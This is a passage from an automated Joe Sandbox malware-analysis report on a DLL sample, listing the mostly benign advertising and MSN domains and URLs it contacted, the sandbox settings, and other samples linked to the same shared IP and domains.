https://doceree.com/.well-known/deviceStorage.json0%Avira URL Cloudsafe
https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
https://www.stroeer.de/ssp-datenschutz0%Avira URL Cloudsafe
https://optimise-it.de/datenschutz0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
contextual.media.net
23.211.6.95
truefalse
    high
    hblg.media.net
    23.211.6.95
    truefalse
      high
      lg3.media.net
      23.211.6.95
      truefalse
        high
        assets.msn.com
        unknown
        unknownfalse
          high
          www.msn.com
          unknown
          unknownfalse
            high
            browser.events.data.msn.com
            unknown
            unknownfalse
              high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://contextual.media.net/rtbsmpubs.php?&gdpr=0&gdprconsent=1&usp_enf=1&usp_status=0&cid=8HBI57XIG&region=nv&ptrid=8PR68Q253&requestString=670468743*4%7C300x250%7C8CU157172%7C858412214%7C&crid=670468743&sd=1&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&bl=1&rt=5&dn=https://contextual.media.net&https=1&act=headerBid&prvReqId=655139198087331261638520979902&erTr=0&hlt=1&ugd=4&adt=desktop&tr=0.17810036448631755&ndec=1&scrsize=1280x1024&taginfo=%7B%7D&pageinfo=%7B%22vw%22%3A284%2C%22vh%22%3A271%2C%22ph%22%3A271%7D&itype=HB-CM&cc=CH&rc=ZH&ct=ZURICH&bt=1&gcp=1&isRefresh=0&callback=window.hbCMBidxc.rtbsheaderBid3S0false
                high
                https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1false
                  high
                  https://contextual.media.net/803288796/fcmain.js?cb=window._mNDetails.initAd&&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=722878611&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1638488555296348136&ugd=4&rtbs=1&nb=1false
                    high
                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=5&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspfalse
                      high
                      https://contextual.media.net/48/nrrV52461.jsfalse
                        high
                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=6&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspfalse
                          high
                          https://lg3.media.net/bping.php?&gdpr=0&prid=8PRVV7640&cid=8CU157172&crid=858412214&vi=1638488555656014322&ugd=4&lf=6&cc=CH&sc=ZH&lper=50&wsip=2886781044&r=1638520979551&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&vgd_l2type=setting&vgd_sbSup=0&vgd_is_amp=0&vgd_asn=60068&vgd_rakh=1638488555181756319&vgd_l1rhst=contextual.media.net&vgd_rpth=%2Fmedianet.php&vgd_pgid=p11306311666t202112030842&vgd_pgids=1&vgd_gdprcs=1&vgd_uspa=0&hvsid=00001638520979548014104136331645&gdpr=0&vgd_end=1false
                            high
                            https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=7479&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspfalse
                              high
                              https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=1053&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,uspfalse
                                high
                                https://lg3.media.net/bqi.php?lf=5&&vgd_l2type=setting&pid=8PO8WH2OT&cme=wKMzE5aEf1C7W8c2Zu-wR6W8-LV6OuNn5M8-l7xIv5OFVIrj5gO7h1h0qwkXsk1YkKHiWm6OwnS8YdF7hxOqVy4gI-Di5bXqA_L7Nj1Gg-bLo1QZupPE9_lkGVq8LafeqNrLclh8bDzLkZpLway17PoLJDHoGdSHRiqjLFunN_rSbZHJFAjGFIv7F87z8XmJ-E7BhMXbxjXouwQLvaGa-ShCB3oRwwh8||NDHRnZ9Gz3KXlI-i9OnZqQ==|5gDUJdTGiJzedmq9hanWYg==|sRBSg3CPSiQ=|YdjFvixrVaHKWoanJxQ7pN1u-FbdnHzrNjhpugAcObH3UBK3ulwAWl7Dk2fLSIhhcacW0wejpmUUSEEp7HvKRQ==|N7fu2vKt8_s=|2Vo1csK06ElQVm9wtd7kmyhUd8oCSycUmnOt-CKThRGW5B7OtbhnTLfgAjgMfKS9GxuAl0hmLh7h59eRacx_zlI1mhj_yGBtc0wpPjW7ZYHmZRI-Qs46jvsASGwtenQv5_6kd41JpbzUVoJx6JhY_2c-CqKREqoxgJ7iifrLoawE2O9aRy41se9ZHO7dRZ1TuzVy17bY00rUzIYODMSLh1Pcyr8slxcI|&gdpr=0&prid=8PRVV7640&cid=8CU157172&crid=858412214&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&vi=1638488555656014322&ugd=4&cc=CH&sc=ZH&bdrid=4&startTime=1638520979055&l2type=setting&vgd_l1rakh=1638488555181756319&l1ch=1&sttm=1638520979548&upk=1638520976.1854&hvsid=00001638520979548014104136331645&verid=9999999&vgd_sc=ZH&infr=1&twna=1&vgd_hbReqId=T1638483495C8S22U926&l1hcsd=l1!N4|8028&vgd_l1rhst=contextual.media.net&vgd_gdprcs=1&vgd_uspa=0&vgd_isiolc=0&clp=%7B%7D&cl=%7B%7D&rtbsd=10&bidData=sd2%3Dnull~bb%3D186~vv%3D0~erpm%3D0.03~ogerpm%3D0.03~MFB%3D2jo~smm_bid%3D0.02~bm%3D1~smm_sd%3D2021120121~sid%3D858412214~sd%3D1~uid%3D2IaaJtXbXqos4SCzmA~dc2%3D1~btd%3D14241703836931763290446355943300556902506328540099388593272215750316032~scd%3Dzh~uim%3D464908~url_tkc%3D0~ss%3D1280x1024~uiw%3D100~ce%3D1~xgb_sd%3D2021101600~last%3D0~CI%3D2624~ip%3D1xrX0Z~fbb%3D0~riipua%3D0%2C0~xgb_nt%3D101~nts%3D1~tb%3D-1~et%3D27~ct%3Dzurich~rc%3D6%2C0~basis2%3D196~url_b%3D0.03~basis1%3D196~isRef%3D0~lc%3D0~url_tvi%3D0~smm_wr%3D2.2127~url_l%3D50~xgboost_b%3D0.92~bid%3D0.02~xgb_b%3D0.92~dc%3D8~gcat%3D500884~ogbid%3D0.02%7C%7Ccbdp%3D0.02%7C%7Cbflag%3D0%7C%7Csobp%3D0%7C%7Cddiv%3D%25%25DFP_DIV%25%25%7C%7Cdmm%3D%25%25DMS_STRATEGY%25%25%7C%7Cdtc%3Dnydc%7C%7Cabte%3DCONTROL%7C%7Chsw%3D%25%25HAS_SECOND_WINNER%25%25~ibc%3D1~ddt%3D-1~nsz%3D1~tgs%3D300x250~bsb%3D0~bsp%3D0~tmx%3D200&matchString=hr%3D0&l2ch=1&l2wsip=170721631&sethcsd=set!A18%7C8013&vgd_pgid=p11306311666t202112030842&vgd_pgids=1false
                                  high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://assets.msn.com/staticsb/statics/latest/oneTrust/1.2/consent/55a804ab-e5c6-4b97-9319-86263d3655a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.drfalse
                                    high
                                    http://searchads.msn.net/.cfm?&&kp=1&{F0A62C50-5414-11EC-90E5-ECF4BB2D2496}.dat.4.dr, ~DFF3249FCAE5CBA117.TMP.4.drfalse
                                      high
                                      https://contextual.media.net/medianet.php?cid=8CU157172de-ch[1].htm.6.drfalse
                                        high
                                        https://www.msn.com/de-ch/nachrichten/coronareisende-ch[1].htm.6.drfalse
                                          high
                                          https://www.msn.com/de-ch/news/other/z%c3%bcrich-zahlt-f%c3%bcr-gr%c3%bcne-hausw%c3%a4nde/ar-AARnq3Zde-ch[1].htm.6.drfalse
                                            high
                                            https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_promotionalstripe_nade-ch[1].htm.6.drfalse
                                              high
                                              https://onedrive.live.com;Fotos52-478955-68ddb2ab[1].js.6.drfalse
                                              • Avira URL Cloud: safe
                                              low
                                              https://www.msn.com/de-ch/sport?ocid=StripeOCIDde-ch[1].htm.6.drfalse
                                                high
                                                https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msnde-ch[1].htm.6.drfalse
                                                  high
                                                  https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel52-478955-68ddb2ab[1].js.6.drfalse
                                                    high
                                                    http://ogp.me/ns/fb#de-ch[1].htm.6.drfalse
                                                      high
                                                      https://www.botman.ninja/privacy-policyiab2Data[1].json.6.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://outlook.live.com/mail/deeplink/compose;Kalender52-478955-68ddb2ab[1].js.6.drfalse
                                                        high
                                                        https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg{F0A62C50-5414-11EC-90E5-ECF4BB2D2496}.dat.4.dr, ~DFF3249FCAE5CBA117.TMP.4.drfalse
                                                          high
                                                          https://www.msn.com/de-ch/news/other/traurig-und-primitiv-rettungswagen-w%c3%a4hrend-einsatz-versprade-ch[1].htm.6.drfalse
                                                            high
                                                            https://www.queryclick.com/privacy-policyiab2Data[1].json.6.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002de-ch[1].htm.6.drfalse
                                                              high
                                                              https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn52-478955-68ddb2ab[1].js.6.drfalse
                                                                high
                                                                https://www.msn.com/de-ch/news/other/wird-etwas-enger-im-bus-werden-die-kapazit%c3%a4t-aber-stemmen-de-ch[1].htm.6.drfalse
                                                                  high
                                                                  http://www.reddit.com/msapplication.xml4.4.drfalse
                                                                    high
                                                                    https://www.skype.com/de-ch[1].htm.6.drfalse
                                                                      high
                                                                      https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlinkde-ch[1].htm.6.drfalse
                                                                        high
                                                                        https://www.msn.com/de-ch/nachrichten/regionalde-ch[1].htm.6.drfalse
                                                                          high
                                                                          https://www.stroeer.de/werben-mit-stroeer/onlinewerbung/programmatic-data/sdi-datenschutz-b2ciab2Data[1].json.6.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://onedrive.live.com/?qt=allmyphotos;Aktuelle52-478955-68ddb2ab[1].js.6.drfalse
                                                                            high
                                                                            https://www.msn.com/de-ch/news/other/die-provisorische-kantonsschule-auf-dem-irchel-kann-2024-startede-ch[1].htm.6.drfalse
                                                                              high
                                                                              https://amzn.to/2TTxhNgde-ch[1].htm.6.drfalse
                                                                                high
                                                                                https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com52-478955-68ddb2ab[1].js.6.drfalse
                                                                                  high
                                                                                  https://client-s.gateway.messenger.live.com52-478955-68ddb2ab[1].js.6.drfalse
                                                                                    high
                                                                                    https://secure.adnxs.com/clktrb?id=764680&amp;t=1de-ch[1].htm.6.drfalse
                                                                                      high
                                                                                      https://www.msn.com/de-ch/de-ch[1].htm.6.drfalse
                                                                                        high
                                                                                        https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site52-478955-68ddb2ab[1].js.6.drfalse
                                                                                          high
                                                                                          http://crl.ver)svchost.exe, 0000000C.00000002.911297448.0000020000062000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          low
                                                                                          https://www.msn.com/de-ch/news/other/lage-dramatisch-zugespitzt-%c3%b6v-in-winterthur-wird-teilweisede-ch[1].htm.6.drfalse
                                                                                            high
                                                                                            https://www.msn.com/de-chde-ch[1].htm.6.drfalse
                                                                                              high
                                                                                              https://www.tippsundtricks.co/gesundheit/stueck-seife-bettwasche/?utm_campaign=DECH-bedsoap&amp;utm_de-ch[1].htm.6.drfalse
                                                                                                high
                                                                                                https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;mde-ch[1].htm.6.drfalse
                                                                                                  high
                                                                                                  https://twitter.com/i/notifications;Ich52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                    high
                                                                                                    https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;httpde-ch[1].htm.6.drfalse
                                                                                                      high
                                                                                                      https://nextmillennium.io/privacy-policy/iab2Data[1].json.6.drfalse
                                                                                                        high
                                                                                                        https://silvermob.com/privacyiab2Data[1].json.6.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://browser.events.data.msn.com/OneCollector/1.0/t.js?qsp=true&anoncknm=%22%22&name=%22MS.News.Wde-ch[1].htm.6.drfalse
                                                                                                          high
                                                                                                          https://clkde.tradedoubler.com/click?p=273363&amp;a=3064090&amp;g=24940322de-ch[1].htm.6.drfalse
                                                                                                            high
                                                                                                            https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                              high
                                                                                                              https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsbde-ch[1].htm.6.drfalse
                                                                                                                high
                                                                                                                http://www.youtube.com/msapplication.xml7.4.drfalse
                                                                                                                  high
                                                                                                                  http://ogp.me/ns#de-ch[1].htm.6.drfalse
                                                                                                                    high
                                                                                                                    https://www.linkedin.com:443/news/story/gibt-es-einen-impfstoffmangel-5630362/?li=BBqfZdVde-ch[1].htm.6.drfalse
                                                                                                                      high
                                                                                                                      https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&amp;hl=de-ch&amp;referde-ch[1].htm.6.drfalse
                                                                                                                        high
                                                                                                                        https://msasg.visualstudio.com/Shared%20Data/_git/1DS.JavaScript?version=GBnubenja%2Fcustom-package52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                          high
                                                                                                                          https://onedrive.live.com/?qt=mru;OneDrive-App52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                            high
                                                                                                                            https://www.skype.com/de52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                              high
                                                                                                                              https://www.tippsundtricks.co/lifehacks/schwamm-kuhlschrank/?utm_campaign=DECH-schwamm&amp;utm_sourcde-ch[1].htm.6.drfalse
                                                                                                                                high
                                                                                                                                https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-mede-ch[1].htm.6.drfalse
                                                                                                                                  high
                                                                                                                                  https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;de-ch[1].htm.6.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://www.skype.com/de/download-skype52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                    high
                                                                                                                                    https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_headerde-ch[1].htm.6.drfalse
                                                                                                                                      high
                                                                                                                                      http://www.hotmail.msn.com/pii/ReadOutlookEmail/52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                        high
                                                                                                                                        https://onedrive.live.com;OneDrive-App52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        low
                                                                                                                                        https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;de-ch[1].htm.6.drfalse
                                                                                                                                          high
                                                                                                                                          https://www.msn.com/de-ch/news/other/erste-best%c3%a4tigte-ansteckung-zwei-weitere-verdachtsf%c3%a4lde-ch[1].htm.6.drfalse
                                                                                                                                            high
                                                                                                                                            https://clkde.tradedoubler.com/click?p=295926&amp;a=3064090&amp;g=24886692de-ch[1].htm.6.drfalse
                                                                                                                                              high
                                                                                                                                              https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngimagestore.dat.6.drfalse
                                                                                                                                                high
                                                                                                                                                https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.drfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.amazon.com/msapplication.xml.4.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=152-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.twitter.com/msapplication.xml5.4.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://cdn.cookielaw.org/vendorlist/googleData.json55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://outlook.com/de-ch[1].htm.6.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;de-ch[1].htm.6.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2~DFF3249FCAE5CBA117.TMP.4.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.jsoniab2Data[1].json.6.drfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://cdn.cookielaw.org/vendorlist/iabData.json55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://onedrive.live.com/?qt=mru;Aktuelle52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.msn.com/de-ch/?ocid=iehp~DFF3249FCAE5CBA117.TMP.4.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-navde-ch[1].htm.6.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.ebay.ch/?mkcid=1&amp;mkrid=5222-53480-19255-0&amp;siteid=193&amp;campid=5338626668&amp;tde-ch[1].htm.6.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://doceree.com/.well-known/deviceStorage.jsoniab2Data[1].json.6.drfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            http://www.nytimes.com/msapplication.xml3.4.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.bidstack.com/privacy-policy/iab2Data[1].json.6.drfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://onedrive.live.com/about/en/download/52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.tippsundtricks.co/lifehacks/kochendes-wasser-auto/?utm_campaign=DECH-cardent&amp;utm_soude-ch[1].htm.6.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_dde-ch[1].htm.6.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.msn.com/de-ch/news/other/kanton-verteidigt-finanzielle-beteiligung-am-kunstprojekt/ar-AAde-ch[1].htm.6.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.msn.com/de-ch/news/other/kanton-best%c3%a4tigt-ersten-omikron-fall-in-z%c3%bcrich/ar-AARde-ch[1].htm.6.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://twitter.com/de-ch[1].htm.6.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.stroeer.de/ssp-datenschutziab2Data[1].json.6.drfalse
                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://optimise-it.de/datenschutziab2Data[1].json.6.drfalse
                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://smartyads.com/privacy-policyiab2Data[1].json.6.drfalse
                                                                                                                                                                                            high

                                                                                                                                                                                            Contacted IPs

                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                            Public

                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                            23.211.6.95
                                                                                                                                                                                            contextual.media.netUnited States
                                                                                                                                                                                            16625AKAMAI-ASUSfalse

                                                                                                                                                                                            Private

                                                                                                                                                                                            IP
                                                                                                                                                                                            127.0.0.1

                                                                                                                                                                                            General Information

                                                                                                                                                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                                            Analysis ID:533067
                                                                                                                                                                                            Start date:03.12.2021
                                                                                                                                                                                            Start time:00:41:18
                                                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                                                            Overall analysis duration:0h 14m 51s
                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                            Report type:full
                                                                                                                                                                                            Sample file name:mATFWhYtPk (renamed file extension from none to dll)
                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                            Number of analysed new started processes analysed:22
                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                            Technologies:
                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                            • HDC enabled
                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                            Classification:mal56.evad.winDLL@30/114@6/2
                                                                                                                                                                                            EGA Information:Failed
                                                                                                                                                                                            HDC Information:
                                                                                                                                                                                            • Successful, ratio: 16% (good quality ratio 15.2%)
                                                                                                                                                                                            • Quality average: 71.3%
                                                                                                                                                                                            • Quality standard deviation: 25.4%
                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                            • Successful, ratio: 75%
                                                                                                                                                                                            • Number of executed functions: 44
                                                                                                                                                                                            • Number of non-executed functions: 281
                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                            • Adjust boot time
                                                                                                                                                                                            • Enable AMSI
                                                                                                                                                                                            • Override analysis time to 240s for rundll32
                                                                                                                                                                                            Warnings:
                                                                                                                                                                                            Show All
                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe
                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.50.102.62, 23.211.6.115, 23.203.70.208, 204.79.197.203, 80.67.82.240, 80.67.82.209, 20.42.73.25, 152.199.19.161, 80.67.82.11, 80.67.82.50, 23.211.4.86
                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, onedscolprdeus06.eastus.cloudapp.azure.com, arc.trafficmanager.net, ieonline.microsoft.com, prod.fs.microsoft.com.akadns.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ie9comview.vo.msecnd.net, a-0003.a-msedge.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, www-msn-com.a-0003.a-msedge.net, a1999.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, any.edge.bing.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, global.asimov.events.data.trafficmanager.net, cs9.wpc.v0cdn.net
                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                            Simulations

                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                            00:43:51API Interceptor2x Sleep call for process: svchost.exe modified

                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                            IPs

                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                            23.211.6.95FBE4.dllGet hashmaliciousBrowse
                                                                                                                                                                                              girlDowTube.dllGet hashmaliciousBrowse
                                                                                                                                                                                                vlJn5g0DP2.dllGet hashmaliciousBrowse
                                                                                                                                                                                                  #Ud83d#Udce0TetratecheFaxNOV03 xti.htmGet hashmaliciousBrowse
                                                                                                                                                                                                    MashreqeFaxNOV03 xti.htmGet hashmaliciousBrowse
                                                                                                                                                                                                      T2bmdvFI1K.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        tim.dllGet hashmaliciousBrowse
                                                                                                                                                                                                          data.dllGet hashmaliciousBrowse
                                                                                                                                                                                                            3bJrnQ0otj.dllGet hashmaliciousBrowse
                                                                                                                                                                                                              JavaE.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                iexploer.dllGet hashmaliciousBrowse

                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                  hblg.media.netCTvjbMY3DK.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  j6cSSlGZK8.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  CTvjbMY3DK.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  S8TePU9taH.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  aRo4FhRug5.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  bUSzS84fr4.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  rpx8zB3thm.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  kivtiYknQS.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  M72Kclc67w.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  4bndVtKthy.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  837375615376.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  837375615376.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  LegacyAudio.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  dowNext.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 23.211.6.95
                                                                                                                                                                                                                  C5GURRmGTj.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  vJMHO50EKO.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  if.bin.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  if.bin.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  0IWd8z89rc.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  6.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  contextual.media.netCTvjbMY3DK.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 2.18.160.23
                                                                                                                                                                                                                  j6cSSlGZK8.dllGet hashmaliciousBrowse
